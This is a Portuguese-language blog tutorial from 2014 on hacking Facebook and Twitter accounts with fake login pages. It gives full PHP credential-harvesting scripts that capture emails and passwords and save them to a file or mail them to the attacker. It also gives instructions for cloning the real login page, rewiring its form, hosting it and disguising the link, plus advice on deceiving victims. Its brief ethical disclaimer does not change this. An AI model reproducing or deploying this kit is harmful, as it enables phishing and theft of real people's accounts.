Posted by : Vagner Ribeiro Soares
segunda-feira, 20 de janeiro de 2014
OBS: Esse tutorial recomenda que tenham um bom conhecimento sobre as linguagens HTML e PHP, para utilizá-lo.
Para a alegria dos “lammers”, está aqui o tutorial onde eu ensinarei como hackear logins de algumas redes sociais, com páginas falsas.
Nessa postagem eu ensinarei a hackear páginas de Facebooke Twitter, pelos vários pedidos dos leitores do site.
OBS: Se você é uma pessoa que têm caráter e responsável pelos teus atos, utilize esse tutorial como conhecimento e não para ficar hackeando “logins” por aí, por brincadeira!
Para quem se lembra de uma postagem anterior onde eu ensino a hackear “logins” de contas de Orkut, este será em um modo bem diferente, más nesta postagem a vítima também terá que ser uma pessoa desatenciosa e que caia na armadilha facilmente.
OBS: Lembre-se que a qualquer momento você não pode está logado na sua conta do Facebook ou Twitter, lá pro final do tutorial eu explico o porquê.
Então vamos ao tutorial:
1) Abra uma nova aba e acesse um link de qualquer fã page que você conheça, ou que você administra no Facebook (www.facebook.com/...???). Já se for pra hackear pelo Twitter, acesse o link do seu perfil no site (www.twitter.com/...???).
2) Se você utiliza o navegador “Internet Explorer”, você terá que clicar com o botão direito de seu mouse no meio da página, e vá na opção “Exibir Código-fonte” (o código HTML da página). Más se o seu for o “Mozilla Firefox”, apenas dê “Ctrl+U” em seu teclado, e em seguida, ao abrir, selecione tudo (Ctrl+A) e copie-o (Ctrl+C).
3) Abra um novo arquivo de “Bloco de notas”, e cole (Ctrl+V) o código HTML. Minimize o arquivo, por enquanto, porque nós utilizaremos mais tarde.
1° Método
1) Se você quer receber o login da vítima em um arquivo de texto, salvo em seu PC, abra um novo arquivo de “Bloco de Notas”, não digite nada, apenas vá a aba “Arquivo” e clique em “salvar” com o nome “logins”.
2) Abra um novo arquivo de “Bloco de notas”, e cole o seguinte código abaixo:
Se a sua página for à do Facebook, digite o seguinte código:
<?php
$nomearquivo ="logins.txt";
$email =$_POST["email"];
$senha =$_POST["pass"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$data =date("Y-m-d");
$hora =date("H:i:s");
$traco ="<br><br>";
$ess ="Email: ".$email."<br>Senha: ".$senha."<br>Navegador: ".$browser."
<br>Data: ".$data."<br>Hora: ".$hora."<br>".$traco;
$abre =@fopen("logins.txt","a+");
$escreve =fwrite($abre, $ess);
echo "<script>javascript:document.location='http://www.facebook.com'
</script>";
?>
Já se a sua página for à do Twitter, o código é o seguinte:
<?php
$nomearquivo ="logins.txt";
$email =$_POST["session[username_or_email]"];
$senha =$_POST["session[password]"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$data =date("Y-m-d");
$hora =date("H:i:s");
$traco ="<br><br>";
$ess ="Email: ".$email."<br>Senha: ".$senha."<br>Navegador: ".$browser."
<br>Data: ".$data."<br>Hora: ".$hora."<br>".$traco;
$abre =@fopen("logins.txt","a+");
$escreve =fwrite($abre, $ess);
echo "<script>javascript:document.location='http://www.twitter.com'
</script>";
?>
3) Salve-o com o nome “save.php”.
2° Método:
1) Já se você deseja receber o login por e-mail, abra um novo arquivo de “Bloco de notas”, e cole o seguinte código abaixo:
Se a sua página for à do Facebook, digite o seguinte código:
<HTML><?
$email =$_POST["email"];
$senha =$_POST["pass"];
$destinatario ="DIGITE O SEU E-MAIL AKI";
$Titulo="Login da vítima hackeado"
$mensagem1="
E-mail: $email
Senha: $senha";
mail ("$Destinatario", "$Titulo", "$mensagem1", "From:$email");
?>
<script language="JavaScript">
javascript:document.location='http://www.facebook.com'
</script>
</HTML>
Já se a sua página for à do Twitter, o código é o seguinte:
<HTML><?
$email =$_POST["session[username_or_email]"];
$senha =$_POST["session[password]"];
$destinatario =" DIGITE O SEU E-MAIL AKI";
$Titulo="Login da vítima hackeado"
$mensagem1="
E-mail: $email
Senha: $senha";
mail ("$Destinatario", "$Titulo", "$mensagem1", "From:$email");
?>
<script language="JavaScript">
javascript:document.location='http://www.twitter.com'
</script>
</HTML>
2) Salve-o com o nome “envia.php”.
Depois de escolher entre os dois métodos, agora vamos publicar o arquivo PHP na internet. Para isso você precisa se cadastrar e hospedar a página entre o site de hospedagem grátis abaixo:
Já hospedado o arquivo PHP, copie o link da arquivo, e volte ao código HTML da página do Facebook ou Twitter, que você colou no arquivo de “Bloco de Notas”. Agora dê “Ctrl+F” (Localizar), e digite no campo de descrição a palavra “action” e clique em “Localizar próxima” só uma vez (caso a sua página for do Twitter, terá que clicar três vezes). Marcado na imagem abaixo substitua o link de login do Facebook ou Twitter, e entre as aspas, cole o arquivo PHP que você hospedou agora pouco.
Agora é só publicar a página fake do Facebook ou Twitter, no site de hospedagem abaixo, o mesmo que utilizamos no tutorial anterior para hackear logins de contas de Orkut:
Paste HTML => http://pastehtml.com/
10) Para camuflar o link da página fake, envie para a vítima, deixando igual ao exemplo abaixo:
[link=coloque aki o link da página fake]QUALQUER FRASE QUE VOCÊ DESEJA DIGITAR AKI[/link]
OBS: Como eu falei no começo do tutorial, eu recomendo que utilizem um link de qualquer fã page do Facebook para ficar mais fácil de enganar a vítima, e enrolando ela, dizendo que você tá divulgando para os seus amigos ou crie sua própria fã page, tanto faz, más que você seja esperto, e saiba enganá-lo. O mesmo eu falo do Twitter, diga a vítima que você está divulgando seu perfil, para a vítima lhe seguir, etc.
Lembre-se de copiar o código HTML, da fã page, quando não estiver logado, na sua conta do Facebook ou Twitter, porque só assim você poderá alterar as tags onde estará o login da página). ;D
Lembre-se de copiar o código HTML, da fã page, quando não estiver logado, na sua conta do Facebook ou Twitter, porque só assim você poderá alterar as tags onde estará o login da página). ;D
Para finalizar, eu deixo uma recomendação importante, se você escolheu o primeiro método, guarde os três arquivos em uma pasta, não os exclua ou modifique-os para outro destino, que depois de hospedados, o site necessita do destino dos arquivos, em que as informações de logins serão salvas no arquivo “logins.txt”, modificando-os, os dados não serão salvos. Caso aconteça, você não terá mais sucesso com o método.
Agora é só testá-lo, e se a vítima cair na armadilha, e digitar o seu “login”, na página fake, você receberá os dados dela, salvos no arquivo “logins.txt” ou por email, dependendo do método que você escolheu acima.